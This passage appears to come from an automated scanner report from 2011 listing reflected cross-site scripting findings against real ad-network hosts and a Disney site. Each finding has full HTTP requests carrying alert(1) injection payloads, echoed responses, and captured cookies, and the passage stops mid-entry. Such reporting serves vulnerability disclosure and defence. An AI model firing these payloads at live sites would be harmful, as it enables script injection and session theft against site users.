GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=3631121c09c"-alert(1)-"29bf5f9ba6d&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:31:10 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ttp%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=3631121c09c"-alert(1)-"29bf5f9ba6d&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_000000
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pubICode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edd95"-alert(1)-"46635aeff4 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912edd95"-alert(1)-"46635aeff4&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8377
Date: Mon, 16 May 2011 01:30:15 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
oQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912edd95"-alert(1)-"46635aeff4&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneo
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46709"-alert(1)-"ff673e56b43 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml46709"-alert(1)-"ff673e56b43&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:32:52 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rack_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml46709"-alert(1)-"ff673e56b43&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_0000001184");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

5.7. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53909"><script>alert(1)</script>6f86f34a5c9 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=53909"><script>alert(1)</script>6f86f34a5c9&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:51 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:50 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=8396388994325352248&fpid=53909"><script>alert(1)</script>6f86f34a5c9&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.8. http://ad.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8be12"><script>alert(1)</script>a7cb27fcac5 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=8be12"><script>alert(1)</script>a7cb27fcac5 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:52 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:52 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2848499807473428303&fpid=1&nu=n&t=&sp=8be12"><script>alert(1)</script>a7cb27fcac5&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afbcc'-alert(1)-'de2db0c7e4f was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193afbcc'-alert(1)-'de2db0c7e4f&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:24:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:24:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:24:15 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193afbcc'-alert(1)-'de2db0c7e4f&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

5.10. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c41fd'-alert(1)-'405c5446774 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc41fd'-alert(1)-'405c5446774 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:25:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:25:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:25:25 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchc41fd'-alert(1)-'405c5446774?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

5.11. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db21a"-alert(1)-"6d8220e3728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=ad&ad_size=728x90&section=1565884&db21a"-alert(1)-"6d8220e3728=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:23:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 01:23:40 GMT
Pragma: no-cache
Content-Length: 4323
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?Z=728x90&db21a"-alert(1)-"6d8220e3728=1&s=1565884&_salt=128442006";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(r
...[SNIP]...

5.12. http://ahome.disney.go.com/globalelements/chrome.css [styleBackground parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/globalelements/chrome.css

Issue detail

The value of the styleBackground request parameter is copied into the HTML document as plain text between tags. The payload e07d2<script>alert(1)</script>792a5655ec9 was submitted in the styleBackground parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=nulle07d2<script>alert(1)</script>792a5655ec9&styleHover=null&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:34:31 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:34:31 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB17
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=D952C2DC-3CBA-42CB-9B90-CD1DC6A6C29F; path=/; expires=Mon, 16-May-2031 01:34:31 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:34:31 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7340
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
de_chromeContainer th { text-align: left; }#gde_chromeContainer {font-size:11px;width:100%;background:none;position:relative;z-index:100000000;}#gde_chromeContents {margin:0 auto;background-color:#nulle07d2<script>alert(1)</script>792a5655ec9;width:996px;height:48px;}#gde_chromeButtons {margin-top:0;float:left;width:634px;}.gde_chromeExploreButtons {border-bottom:solid 1px #acacac;width:100%;}.gde_chromePlayButtons {height:23px;width:100%;
...[SNIP]...

5.13. http://ahome.disney.go.com/globalelements/chrome.css [styleHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/globalelements/chrome.css

Issue detail

The value of the styleHover request parameter is copied into the HTML document as plain text between tags. The payload caeb3<script>alert(1)</script>2a777733971 was submitted in the styleHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /globalelements/chrome.css?secure=false&IE6=false&styleSet=mediumGray&styleText=null&styleTextHover=null&styleTextSelected=null&styleBackground=null&styleHover=nullcaeb3<script>alert(1)</script>2a777733971&styleMiddleLine=null&styleSelected=null HTTP/1.1
Host: ahome.disney.go.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gi=usa|vt|stowe|broadband|44.500|-72.646|05672|e5c95626; mbox=check#true#1305508873|session#1305508812278-378400#1305510673; s_pers=%20s_gpv_pn%3Dwdpro%252Fdcl%252Fus%252Fen%252Fcontent%252Fhome%7C1305510612305%3B; s_sess=%20s_cc%3Dtrue%3B%20s_wdpro_lid%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E83DEA0516148B-600001A140014B4E[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=43200
Date: Mon, 16 May 2011 01:35:28 GMT
Content-Type: text/css; charset=iso-8859-1
Last-Modified: Mon, 16 May 2011 01:35:28 GMT
Server: Microsoft-IIS/6.0
From: DOLDISWEB10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Set-Cookie: SWID=3FD48562-E5BB-4B43-B1D0-D2B8211B97E1; path=/; expires=Mon, 16-May-2031 01:35:28 GMT; domain=.go.com;
Cache-Expires: Mon, 16 May 2011 13:35:28 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7496
Connection: keep-alive

#gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chromeContainer legend,#gde_chromeContaine
...[SNIP]...
:left;background-image:url('http://a.dolimg.com/en-US/dcom/media/chrome/sprites/chromeSprites.png');background-repeat:no-repeat;background-position:32px 6px;}a.gde_homeLink:hover{background-color:#nullcaeb3<script>alert(1)</script>2a777733971;}#gde_chromeSearch{margin: 16px 1px 0 0;padding:0 0 0 4px;float:right;border:none;width:150px;height:18px;line-height:18px;background-color:#FFFFFF;text-align:left;font-weight:bold;font-size:12px;}.gd
...[SNIP]...

5.14. http://ahome.disney.go.com/globalelements/chrome.css [styleMiddleLine parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ahome.disney.go.com
Path:	/globalelements/chrome.css

Issue detail

